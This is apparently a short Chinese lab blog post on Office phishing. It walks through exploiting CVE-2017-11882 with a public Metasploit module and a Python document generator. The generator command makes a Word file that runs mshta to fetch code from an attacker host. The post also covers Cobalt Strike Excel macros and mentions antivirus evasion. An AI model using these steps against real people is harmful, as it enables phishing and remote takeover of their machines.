office简单钓鱼与cve2017-11882

cve2017-11882

靶机 windows07

攻击机 kali

1)先下载msf payload与py生成的word

msf payload

https://github.com/0x09AL/CVE-2017-11882-metasploit

路径
cve_2017_11882.rb 放在usr/share/metasploit-framework/modules/exploits/windows/smb

cve-2017-11882.rtf放在usr/share/metasploit-framework/data/exploits/
指令

mv cve-2017-11882.rtf /usr/share/metasploit-framework/data/exploits/


word py

https://github.com/Ridter/CVE-2017-11882/

生成word

python Command109b_CVE-2017-11882.py -c "mshta http://192.168.5.102:8080/test" -o test.doc

2)配置msf

进入msf
依次

3)

将生成的t.doc放入win7,然后执行

这里我无法进入meterpreter,可直接退出,然后session查看

利用cs生成office宏




复制cs代码,然后保存为启用宏的excel


打开,会有禁用宏,然后启用。cs上线

利用宏的方式必须启用。

这两种皆会被查杀,需考虑免杀问题。

office简单钓鱼与cve2017-11882相关推荐

  1. 红队简单钓鱼实战---office宏

    前言 本文发布已获得本人授权!本文仅用于技术学习和交流,严禁用于非法用途,否则产生的一切后果自行承担. 一.office宏介绍 宏是微软公司为其OFFICE软件包设计的一个特殊功能,软件设计者为了让人 ...

  2. CS制作office宏病毒钓鱼

    一.实验目的 1. 利用CobaltStrile生成word宏病毒的钓鱼payload,实现远程控制对方主机 二.实验器材 1.vmware 15.5 2.kali linux 3.cobaltstr ...

  3. 使用setoolkit制作简单钓鱼网站

    setoolkit 构建钓鱼网站 输入setoolkit打开框架 输入1 输入2 输入3 输入1 输入本机IP 输入2 在本机谷歌浏览器进行访问 输入email和password登录

  4. Windows下用某品牌随身WiFi搭建一个钓鱼热点

    *本文原创作者:Leslie___Cheung ,本文属于原创博客,未经许可禁止转载. *本文内容仅代表作者观点且只做测试展示,目的是提醒读者注意 WiFi 联网安全,严禁将内容用于不法用途. 目录 ...

  5. DEFCON CHINABCTF的一些随笔

    萌新的第一次线下决赛,毫无意外的被打爆,打扰了我太菜了,告辞! 下面记录一下这次的收获吧. 靶场渗透 这次靶场是打的真的爽,也学习了很多东西.从一个博客开始到服务器到内网最后拿域控权限,打的真的爽啊. ...

  6. 重建SYSVOL和NETLOGON共享

    重建SYSVOL和NETLOGON共享<?xml:namespace prefix = o ns = "urn:schemas-microsoft-com:office:office& ...

  7. 财务管理专业计算机要学什么,我是学财务管理专业的,我想考计算机二级,请问考哪个比较好...

    我是学财务管理专业的,我想考计算机二级,请问考哪个比较好以下文字资料是由(历史新知网www.lishixinzhi.com)小编为大家搜集整理后发布的内容,让我们赶快一起来看一下吧! 我是学财务管理专 ...

  8. 【资源总结】前端资源收集

    前端摸索过程插件学习与解决方法记录下来: 一:前端资源 1.软实力 1.1:开发人员的必备技能 http://blog.csdn.net/powertoolsteam/article/details/ ...

  9. 计算机二级wps和c语言,2021年3月计算机二级要报名了。报哪一科呢?要不要报名二级WPS?...

    2021年3月计算机二级要报名了,详细点下面: 那么,该报名哪一科呢?二级office,这次不好考二级Office,今年第一次改Office 2016 虽然题库都会更新为2016版, 然而题目和评分变 ...

最新文章

  1. 大数据学习笔记二:Ubuntu/Debian 下安装大数据框架Hadoop
  2. Mallet Java【Windows下配置】(解决Ant安装可能会失败的解决方案)
  3. python的实现和测试是啥意思_Python接口自动化测试之pytest与unittest区别
  4. python输入输出有问题_使用pySerial从Python获取输入/输出错误
  5. 服务器的图片无法显示,服务器的图片无法显示
  6. Arrays工具类和二维数组
  7. UWP 使用exe程序
  8. 计算机wps如何排序,wps怎么排序【解答方案】
  9. 利用 filter 机制 给 静态资源 url 加上时间戳,来防止js和css文件的缓存,利于开发调试...
  10. php版ueditor配置_ThinkPHP配置UEditor
  11. 在职工程师如何在乾颐堂通过HCIE认证考试一瞥(王IE战报)
  12. 小程序源码:王者荣耀战力查询微信小程序源码下载支持安卓苹果微信QQ等多区查询
  13. SharePoint Designer定制MOSS/WSS表单页面
  14. 调色盘——将真彩色图像降级为低分辨率图像的八叉树算法
  15. 线上收单和线下收单的区别
  16. 虾皮的注册流程是什么?怎么注册虾皮?
  17. NewStarCTF 公开赛赛道 WEEK2 pwn 砍一刀
  18. 为什么打开wps文字背景是绿色的?怎么变成白色的呢?
  19. scrum立会报告+燃尽图(第二周第三次)
  20. SpringMVC超详细入门

热门文章

  1. 淘宝技术发展1(前言)
  2. 如何查看Ubuntu版本号
  3. Unity 家居摆放系统设计 (一)
  4. 当当Api item_get - 获得dangdang商品详情
  5. 取消Spark中打印日志
  6. C语言--PTA三天打渔两天晒网问题
  7. 实习招聘 | 后摩智能解决方案算法实习生
  8. torch 安装torch_sparse失败
  9. 打开的一篇word文档,保存到数据库的某个字段中
  10. html 获取视频文件的宽高尺寸,怎么获取视频的宽度-解决方案